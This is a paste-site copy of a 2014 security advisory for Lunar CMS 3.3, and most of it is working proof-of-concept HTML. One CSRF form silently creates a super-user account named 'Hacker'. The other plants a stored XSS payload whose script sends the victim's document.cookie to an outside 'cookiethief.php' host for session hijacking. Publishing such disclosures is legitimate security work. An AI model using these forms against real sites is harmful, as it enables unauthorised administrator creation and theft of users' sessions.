Lunar CMS 3.3 - CSRF And Stored XSS Vulnerability


SUBMITTED BY: Guest

DATE: July 13, 2014, 2:40 a.m.

FORMAT: Text only

SIZE: 3.4 kB

HITS: 722

  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
  9. 9
  10. 10
  11. 11
  12. 12
  13. 13
  14. 14
  15. 15
  16. 16
  17. 17
  18. 18
  19. 19
  20. 20
  21. 21
  22. 22
  23. 23
  24. 24
  25. 25
  26. 26
  27. 27
  28. 28
  29. 29
  30. 30
  31. 31
  32. 32
  33. 33
  34. 34
  35. 35
  36. 36
  37. 37
  38. 38
  39. 39
  40. 40
  41. 41
  42. 42
  43. 43
  44. 44
  45. 45
  46. 46
  47. 47
  48. 48
  49. 49
  50. 50
  51. 51
  52. 52
  53. 53
  54. 54
  55. 55
  56. 56
  57. 57
  58. 58
  59. 59
  60. 60
  61. 61
  62. 62
  63. 63
  64. 64
  65. 65
  66. 66
  67. 67
  68. 68
  69. 69
  70. 70
  71. 71
  72. 72
  73. 73
  74. 74
  75. 75
  76. 76
  77. 77
  78. 78
  79. 79
  80. 80
  81. 81
  82. 82
  83. 83
  84. <!--
  85. Lunar CMS 3.3 CSRF And Stored XSS Vulnerability
  86. Vendor: Lunar CMS
  87. Product web page: http://www.lunarcms.com
  88. Affected version: 3.3
  89. Summary: Lunar CMS is a freely distributable open sourcecontent
  90. management system written for use on servers running the ever so
  91. popular PHP5 & MySQL.
  92. Desc: Lunar CMS suffers from a cross-site request forgery and a
  93. stored xss vulnerabilities. The application allows users to perform
  94. certain actions via HTTP requests without performing any validity
  95. checks to verify the requests. This can be exploited to perform
  96. certain actions with administrative privileges if a logged-in user
  97. visits a malicious web site. Input passed to the 'subject' and 'email'
  98. POST parameters thru the 'Contact Form' extension/module is not properly
  99. sanitised before being returned to the user. This can be exploited to
  100. execute arbitrary HTML and script code in a user's browser session in
  101. context of an affected site.
  102. Tested on: Apache/2.4.7 (Win32)
  103. PHP/5.5.6
  104. MySQL 5.6.14
  105. Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
  106. @zeroscience
  107. Advisory ID: ZSL-2014-5188
  108. Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5188.php
  109. 11.06.2014
  110. -->
  111. CSRF Add Admin
  112. ===============
  113. <html>
  114. <body>
  115. <form action="http://localhost/lunarcms/admin/user_create.php" method="POST">
  116. <input type="hidden" name="name" value="Hacker" />
  117. <input type="hidden" name="email" value="lab@zeroscience.mk" />
  118. <input type="hidden" name="password1" value="251ftw" />
  119. <input type="hidden" name="password2" value="251ftw" />
  120. <input type="hidden" name="access" value="0" />
  121. <input type="hidden" name="Submit" value="submit" />
  122. <input type="submit" value="Submit form" />
  123. </form>
  124. </body>
  125. </html>
  126. Access levels:
  127. 0: Super user
  128. 1: Admin
  129. 2: Website only
  130. CSRF Stored XSS (Session Hijack)
  131. =================================
  132. <html>
  133. <body>
  134. <form action="http://localhost/lunarcms/admin/extensions.php?ext=contact_form&top" method="POST">
  135. <input type="hidden" name="email" value='"><script>alert(1);</script>' />
  136. <input type="hidden" name="error" value="2" />
  137. <input type="hidden" name="sent" value="1" />
  138. <input type="hidden" name="subject" value='"><script>var x = new Image();x.src='http://www.example.com/cookiethief.php?cookie='+document.cookie;</script>' />
  139. <input type="hidden" name="submit" value="submit" />
  140. <input type="submit" value="Submit form" />
  141. </form>
  142. </body>
  143. </html>

comments powered by Disqus